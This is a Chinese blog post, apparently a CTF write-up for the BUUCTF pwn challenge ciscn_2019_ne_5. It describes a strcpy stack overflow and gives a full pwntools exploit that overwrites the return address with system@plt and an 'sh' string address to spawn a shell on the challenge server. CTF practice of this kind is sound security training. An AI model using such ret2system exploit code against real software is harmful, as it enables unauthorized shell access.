【BUUCTF】ciscn_2019_ne_5 Write Up

最新推荐文章于 2023-05-18 10:24:35 发布
最新推荐文章于 2023-05-18 10:24:35 发布
阅读量828 收藏 1
点赞数
分类专栏: BUUCTF - PWN 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107845671
版权





题目是一道32位程序,依旧是rop

仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节

程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='i386'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',29580)
#io=process('./ciscn_2019_ne_5')
elf=ELF('./ciscn_2019_ne_5')

ra()
sl('administrator')
ra()
sl('1')
ra()
sl('a'*76+p32(elf.plt['system'])+p32(0x80482ea)+p32(0x80482ea))
ra()
sl('4')

io.interactive()

system后面的一个双字是返回地址,这里用不到,直接填的sh的地址,但是要保证每一位都不为零,否则strcpy会断掉

古月浪子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UEFITool_NE_A51_win32.zip
12-24
UEFITool_NE_A51_win32
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
世界地形地图,giff栅格类型的图层,可以在Arcgis或QGIS中打开
ciscn_2019_n_5
最新发布
小白垃圾笔记2
05-18 40
那么如果name有可执行权限就把shell写道bss里。然后利用text的溢出,覆盖返回地址为name的地址。为什么不把shellcode写到text?因为,不能确定地址。这道题,刚开始用的是卡里,发现bss段没有可执行权限。后来放到了ubuntu18里才有。小白垃圾做题笔记,不建议阅读。
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1582
buuctf ciscn_2019_ne_5题目分析
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 663
[buuctf]ciscn_2019_n_5
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 257
PWN ciscn_2019_ne_5
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 498
ciscn_2019_ne_5 BUUCTF
ATOS.rar_ATOS NE_Atos
09-19
熟习无线传感器开发ATOS平台的使用和开发自己的传感器应用程序基于nesC语言
test_eth.rar_EMAC PHY_MC9S12NE64
09-24
MC9S12NE64网络收发测试代码,使用了芯片的EMAC和内部PHY
opengl.rar_OPENGL NE_nehe lesson_opengl nehe
09-23
nehe的opengl教程,是一部很好的opengl方面的学习资料
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3169
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
ciscn_2019_c_5
doudoudedi
02-09 518
思路 格式化字符串leak然后打free_hook exp: from pwn import * #p=process('./ciscn_2019_c_5') p=remote('node3.buuoj.cn',27000) elf=ELF('./ciscn_2019_c_5') libc=elf.libc def add(size,story): p.sendlineafter(':'...
BUUCTFPWN】ciscn_2019_ne_5
m0_55368674的博客
01-15 160
BUUCTFPWN】ciscn_2019_ne_5
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1395
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTFPWN】ciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 371
BUUCTFPWN】ciscn_2019_n_5题解
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 299
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1866
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF pwn——ciscn_2019_n_5
CNS-Enterprise BCC-1701-J
04-07 161
BUUCTF 做题练习
PWN刷题记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 285
这是第一篇的刷题记录,从ret2text开始刷起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 189
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值